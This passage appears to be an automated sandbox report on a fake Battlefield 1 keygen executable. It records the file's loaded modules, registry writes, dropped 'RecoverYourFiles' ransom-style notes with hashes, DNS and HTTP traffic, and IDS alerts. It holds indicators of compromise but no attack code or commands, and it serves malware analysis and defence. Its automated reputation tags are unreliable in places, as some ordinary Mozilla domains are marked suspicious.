c:\windows\system32\rpcrt4.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\cryptbase.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll

PID
992
CMD
C:\Windows\system32\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503}
Path
C:\Windows\system32\DllHost.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Version:
Company
Microsoft Corporation
Description
COM Surrogate
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\dllhost.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\user32.dll
c:\windows\system32\usp10.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\program files\windows photo viewer\photoviewer.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\version.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\d3d9.dll
c:\windows\system32\d3d8thk.dll
c:\windows\system32\slc.dll
c:\windows\system32\windowscodecs.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll
c:\windows\system32\oleacc.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\program files\windows photo viewer\photobase.dll
c:\windows\system32\propsys.dll
c:\program files\internet explorer\ieproxy.dll
c:\windows\system32\actxprxy.dll
c:\program files\windows photo viewer\imagingengine.dll
c:\windows\system32\mscms.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\thumbcache.dll
c:\windows\system32\psapi.dll
c:\windows\system32\icm32.dll
c:\windows\system32\linkinfo.dll

Registry activity

Total events
560
Read events
543
Write events
17
Delete events
0

Modification events

PID
Process
Operation
Key
Name
Value
2620
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
ShellExtBMP
2620
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
ShellExtIcon
2620
WinRAR.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\12B\52C64B7E
LanguageList
en-US
2620
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
0
C:\Users\admin\AppData\Local\Temp\Battlefield-1-Keygen-Serial-Key-Generator.rar
2620
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
name
120
2620
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
size
80
2620
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
type
120
2620
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
mtime
100
2620
WinRAR.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
2620
WinRAR.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
2484
Battlefield-1-Keygen-Serial-Key-Generator.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
2484
Battlefield-1-Keygen-Serial-Key-Generator.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
992
DllHost.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Direct3D\MostRecentApplication
Name
DllHost.exe

Files activity

Executable files
3
Suspicious files
0
Text files
14
Unknown types
0

Dropped files

PID
Process
Filename
Type
2620
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$EXa2620.4422\Battlefield-1-Keygen-Serial-Key-Generator.exe
executable
MD5: 5424427b66ab5f107f278acf72182b4b
SHA256: 3a2dd7c89418ff6ccc58dca8558136229682ecf01c9c01ae4e53a9a919632e31
2620
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$EXa2620.2142\Battlefield-1-Keygen-Serial-Key-Generator.exe
executable
MD5: 5424427b66ab5f107f278acf72182b4b
SHA256: 3a2dd7c89418ff6ccc58dca8558136229682ecf01c9c01ae4e53a9a919632e31
2620
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$EXa2620.4088\Battlefield-1-Keygen-Serial-Key-Generator.exe
executable
MD5: 5424427b66ab5f107f278acf72182b4b
SHA256: 3a2dd7c89418ff6ccc58dca8558136229682ecf01c9c01ae4e53a9a919632e31
2484
Battlefield-1-Keygen-Serial-Key-Generator.exe
C:\Users\admin\Desktop\RecoverYourFiles2.rtf
text
MD5: e9687094535e7e895b8875d6155bdc97
SHA256: ab6478f9966f617bc3c07c2ad560a47981684a939d11ff41dd03d9241a0fa429
2484
Battlefield-1-Keygen-Serial-Key-Generator.exe
C:\Users\admin\Desktop\RecoverYourFiles4.bmp
image
MD5: 7a4a983ed6c15eb936d2a0533db33c10
SHA256: bdac1b859527d4ee1ea1467c046f259d958a6115f40bc338c4335beded3560c0
2484
Battlefield-1-Keygen-Serial-Key-Generator.exe
C:\Users\admin\Desktop\RecoverYourFiles3.bmp
image
MD5: 7a4a983ed6c15eb936d2a0533db33c10
SHA256: bdac1b859527d4ee1ea1467c046f259d958a6115f40bc338c4335beded3560c0
2484
Battlefield-1-Keygen-Serial-Key-Generator.exe
C:\Users\admin\Desktop\RecoverYourFiles2.bmp
image
MD5: 7a4a983ed6c15eb936d2a0533db33c10
SHA256: bdac1b859527d4ee1ea1467c046f259d958a6115f40bc338c4335beded3560c0
2484
Battlefield-1-Keygen-Serial-Key-Generator.exe
C:\Users\admin\Desktop\RecoverYourFiles.bmp
image
MD5: 7a4a983ed6c15eb936d2a0533db33c10
SHA256: bdac1b859527d4ee1ea1467c046f259d958a6115f40bc338c4335beded3560c0
2484
Battlefield-1-Keygen-Serial-Key-Generator.exe
C:\Users\admin\Desktop\RecoverYourFiles2.htm
html
MD5: 3917e4dfb604760b5b57c55bdbdc7b78
SHA256: 562726998d61b40b8aafa36b504a34151c4b8e1e1316b398eb072916fdcdcd16
2484
Battlefield-1-Keygen-Serial-Key-Generator.exe
C:\Users\admin\Desktop\RecoverYourFiles3.htm
html
MD5: 3917e4dfb604760b5b57c55bdbdc7b78
SHA256: 562726998d61b40b8aafa36b504a34151c4b8e1e1316b398eb072916fdcdcd16
2484
Battlefield-1-Keygen-Serial-Key-Generator.exe
C:\Users\admin\Desktop\RecoverYourFiles4.htm
html
MD5: 3917e4dfb604760b5b57c55bdbdc7b78
SHA256: 562726998d61b40b8aafa36b504a34151c4b8e1e1316b398eb072916fdcdcd16
2484
Battlefield-1-Keygen-Serial-Key-Generator.exe
C:\Users\admin\AppData\Local\Runners\DefaultDomain_Path_a0u4qj0kdn0aarctshpc1pbw2hhmvnhg\1.0.0.0\h2wgo5ap.newcfg
––
MD5:  ––
SHA256:  ––
2484
Battlefield-1-Keygen-Serial-Key-Generator.exe
C:\Users\admin\Desktop\RecoverYourFiles4.rtf
text
MD5: e9687094535e7e895b8875d6155bdc97
SHA256: ab6478f9966f617bc3c07c2ad560a47981684a939d11ff41dd03d9241a0fa429
2484
Battlefield-1-Keygen-Serial-Key-Generator.exe
C:\Users\admin\Desktop\RecoverYourFiles.rtf
text
MD5: e9687094535e7e895b8875d6155bdc97
SHA256: ab6478f9966f617bc3c07c2ad560a47981684a939d11ff41dd03d9241a0fa429
2484
Battlefield-1-Keygen-Serial-Key-Generator.exe
C:\Users\admin\Desktop\RecoverYourFiles3.rtf
text
MD5: e9687094535e7e895b8875d6155bdc97
SHA256: ab6478f9966f617bc3c07c2ad560a47981684a939d11ff41dd03d9241a0fa429
2484
Battlefield-1-Keygen-Serial-Key-Generator.exe
C:\Users\admin\Desktop\RecoverYourFiles.htm
html
MD5: 3917e4dfb604760b5b57c55bdbdc7b78
SHA256: 562726998d61b40b8aafa36b504a34151c4b8e1e1316b398eb072916fdcdcd16
2484
Battlefield-1-Keygen-Serial-Key-Generator.exe
C:\Users\admin\AppData\Local\Runners\DefaultDomain_Path_a0u4qj0kdn0aarctshpc1pbw2hhmvnhg\1.0.0.0\user.config
xml
MD5: a84858a2abc20e431e62b03e053d557b
SHA256: 9766d132592c8ff472572ab511722ec243025c2fc6681d5a394103d96d663f04
2484
Battlefield-1-Keygen-Serial-Key-Generator.exe
C:\Users\admin\AppData\Local\Runners\DefaultDomain_Path_a0u4qj0kdn0aarctshpc1pbw2hhmvnhg\1.0.0.0\fdcgoq_9.newcfg
––
MD5:  ––
SHA256:  ––
2484
Battlefield-1-Keygen-Serial-Key-Generator.exe
C:\Users\admin\AppData\Local\Runners\DefaultDomain_Path_a0u4qj0kdn0aarctshpc1pbw2hhmvnhg\1.0.0.0\user.config
xml
MD5: e2da960826519d0da4509dad06aa8a61
SHA256: 9042b6adee274b2c2d9f62d6f01ec1baef977cf2e8f1d294dbd54449b7e7fbcd

Find more information of the staic content and download it at the full report

Network activity

HTTP(S) requests
10
TCP/UDP connections
31
DNS requests
91
Threats
2

HTTP requests

PID Process Method HTTP Code IP URL CN Type Size Reputation
–– –– GET 200 185.225.251.24:80 http://detectportal.firefox.com/success.txt unknown
text
whitelisted
–– –– POST 200 93.184.220.29:80 http://ocsp.digicert.com/ US
binary
der
whitelisted
–– –– POST 200 93.184.220.29:80 http://ocsp.digicert.com/ US
binary
der
whitelisted
–– –– POST 200 216.58.206.3:80 http://ocsp.pki.goog/gts1o1 US
binary
der
whitelisted
–– –– POST 200 216.58.206.3:80 http://ocsp.pki.goog/gts1o1 US
binary
der
whitelisted
–– –– POST 200 216.58.206.3:80 http://ocsp.pki.goog/gts1o1 US
binary
der
whitelisted
–– –– POST 200 93.184.220.29:80 http://ocsp.digicert.com/ US
binary
der
whitelisted
–– –– POST 200 216.58.206.3:80 http://ocsp.pki.goog/gts1o1 US
binary
der
whitelisted
–– –– POST 200 216.58.206.3:80 http://ocsp.pki.goog/gts1o1 US
binary
der
whitelisted
–– –– POST 200 216.58.206.3:80 http://ocsp.pki.goog/gts1o1 US
binary
der
whitelisted

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID Process IP ASN CN Reputation
–– –– 185.225.251.24:80 –– unknown
–– –– 35.164.109.147:443 Amazon.com, Inc. US unknown
–– –– 54.190.34.249:443 Amazon.com, Inc. US malicious
–– –– 93.184.220.29:80 MCI Communications Services, Inc. d/b/a Verizon Business US whitelisted
–– –– 13.35.253.53:443 US unknown
–– –– 52.39.224.180:443 Amazon.com, Inc. US unknown
–– –– 172.217.18.170:443 Google Inc. US whitelisted
–– –– 216.58.206.3:80 Google Inc. US whitelisted
–– –– 13.35.253.117:443 US unknown
–– –– 13.35.253.55:443 US suspicious
–– –– 216.58.207.68:443 Google Inc. US whitelisted
–– –– 35.167.176.126:443 Amazon.com, Inc. US unknown
–– –– 172.217.23.174:443 Google Inc. US whitelisted
–– –– 143.204.214.50:443 US unknown
–– –– 172.217.16.195:443 Google Inc. US whitelisted
–– –– 172.217.18.3:443 Google Inc. US whitelisted
–– –– 172.217.23.98:443 Google Inc. US unknown
–– –– 216.58.205.238:443 Google Inc. US whitelisted
–– –– 172.217.22.34:443 Google Inc. US whitelisted
–– –– 172.217.21.226:443 Google Inc. US whitelisted
–– –– 52.24.89.101:443 Amazon.com, Inc. US unknown

DNS requests

Domain IP Reputation
detectportal.firefox.com 185.225.251.24
185.225.251.10
whitelisted
a1089.dscd.akamai.net No response whitelisted
search.services.mozilla.com 35.164.109.147
52.35.182.58
52.89.218.39
whitelisted
search.r53-2.services.mozilla.com 52.89.218.39
52.35.182.58
35.164.109.147
whitelisted
push.services.mozilla.com 54.190.34.249
whitelisted
autopush.prod.mozaws.net 54.190.34.249
whitelisted
ocsp.digicert.com 93.184.220.29
whitelisted
cs9.wac.phicdn.net 93.184.220.29
whitelisted
snippets.cdn.mozilla.net 13.35.253.53
13.35.253.31
13.35.253.14
13.35.253.28
whitelisted
d228z91au11ukj.cloudfront.net No response malicious
tiles.services.mozilla.com 52.39.224.180
54.149.128.76
52.33.184.165
52.39.125.254
52.33.13.207
54.186.225.209
52.24.113.72
52.89.51.22
whitelisted
tiles.r53-2.services.mozilla.com No response whitelisted
safebrowsing.googleapis.com 172.217.18.170
whitelisted
ocsp.pki.goog 216.58.206.3
whitelisted
pki-goog.l.google.com 216.58.206.3
whitelisted
firefox.settings.services.mozilla.com 13.35.253.117
13.35.253.101
13.35.253.99
13.35.253.45
whitelisted
d2k03kvdk5cku0.cloudfront.net 13.35.253.45
13.35.253.99
13.35.253.101
13.35.253.117
whitelisted
support.mozilla.org 34.209.95.119
34.213.134.214
whitelisted
foundation.mozilla.org 3.233.253.156
34.201.179.37
52.3.157.51
52.7.241.210
54.165.145.59
35.174.159.248
52.20.12.96
52.73.147.107
suspicious
www.mozilla.org 104.16.143.228
104.16.142.228
whitelisted
foundation.mozilla.org.herokudns.com 52.73.147.107
52.20.12.96
35.174.159.248
54.165.145.59
52.7.241.210
52.3.157.51
34.201.179.37
3.233.253.156
suspicious
prod-tp.sumo.mozit.cloud No response whitelisted
www.mozilla.org.cdn.cloudflare.net 104.16.142.228
104.16.143.228
whitelisted
www.youtube.com 172.217.16.174
172.217.16.142
172.217.23.110
216.58.206.14
172.217.18.174
172.217.23.142
172.217.22.14
172.217.21.238
172.217.23.174
216.58.210.14
172.217.22.110
172.217.22.78
whitelisted
youtube-ui.l.google.com 172.217.22.78
172.217.16.174
172.217.16.142
172.217.23.110
216.58.206.14
172.217.18.174
172.217.23.142
172.217.22.14
172.217.21.238
172.217.23.174
216.58.210.14
172.217.22.110
whitelisted
www.facebook.com 157.240.20.35
whitelisted
star-mini.c10r.facebook.com 157.240.20.35
whitelisted
www.ebay.de 72.247.226.12
whitelisted
www.reddit.com 151.101.1.140
151.101.65.140
151.101.129.140
151.101.193.140
whitelisted
e11847.g.akamaiedge.net 72.247.226.12
whitelisted
www.wikipedia.org 91.198.174.192
whitelisted
dyna.wikimedia.org No response whitelisted
blog.mozilla.org 35.197.18.156
whitelisted
reddit.map.fastly.net 151.101.193.140
151.101.129.140
151.101.65.140
151.101.1.140
whitelisted
mozilla.wpengine.com 35.197.18.156
whitelisted
content-signature-2.cdn.mozilla.net 13.35.253.55
13.35.253.75
13.35.253.70
13.35.253.78
whitelisted
d2nxq2uap88usk.cloudfront.net No response whitelisted
www.google.com 216.58.207.68
whitelisted
shavar.services.mozilla.com 35.167.176.126
34.213.241.62
34.213.214.155
35.164.178.120
18.236.49.179
52.25.50.137
52.32.91.14
52.39.168.38
whitelisted
shavar.prod.mozaws.net 52.39.168.38
52.32.91.14
52.25.50.137
18.236.49.179
35.164.178.120
34.213.214.155
34.213.241.62
35.167.176.126
whitelisted
consent.google.com 172.217.23.174
whitelisted
d1zkz3k4cclnv6.cloudfront.net 143.204.214.56
143.204.214.80
143.204.214.105
143.204.214.50
whitelisted
tracking-protection.cdn.mozilla.net 143.204.214.50
143.204.214.105
143.204.214.80
143.204.214.56
whitelisted
www.gstatic.com 172.217.16.195
whitelisted
apis.google.com 172.217.23.174
whitelisted
plus.l.google.com 172.217.23.174
whitelisted
www.google.nl 172.217.18.3
whitelisted
ogs.google.com 216.58.205.238
whitelisted
adservice.google.com 172.217.23.98
whitelisted
pagead46.l.doubleclick.net 172.217.23.98
whitelisted
www3.l.google.com 216.58.205.238
whitelisted
adservice.google.nl 172.217.22.34
whitelisted
googleads.g.doubleclick.net 172.217.21.226
whitelisted
incoming.telemetry.mozilla.org 52.24.89.101
52.10.187.18
52.36.57.225
52.43.139.170
52.32.219.185
52.39.3.8
52.40.106.174
52.35.171.123
whitelisted

Threats

PID Process Class Message
–– –– Potentially Bad Traffic ET INFO Observed DNS Query to .cloud TLD
–– –– Potentially Bad Traffic ET INFO Observed DNS Query to .cloud TLD

Debug output strings

No debug info.